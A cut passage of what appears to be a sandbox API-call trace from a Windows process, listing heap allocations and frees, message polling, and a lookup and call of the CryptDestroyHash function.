hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0152.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0152.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0152.560] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0152.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0152.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0152.560] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0152.560] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0152.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.560] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0152.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0152.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0152.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0152.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0152.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0152.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a70 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b48 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0152.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.563] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0152.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a58 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0152.563] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0152.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0152.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0152.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0152.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0152.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0152.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0152.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0152.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0152.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0152.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0152.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0152.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0152.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0152.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0152.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0152.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0152.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0152.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0152.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0152.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0152.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b08 [0152.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0152.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0152.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0152.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0152.566] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0152.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.566] CryptDestroyHash (hHash=0xa872d0) returned 1 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0152.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0152.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0152.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0152.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0152.568] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0152.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0152.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0152.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0152.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.569] HeapFree (in: 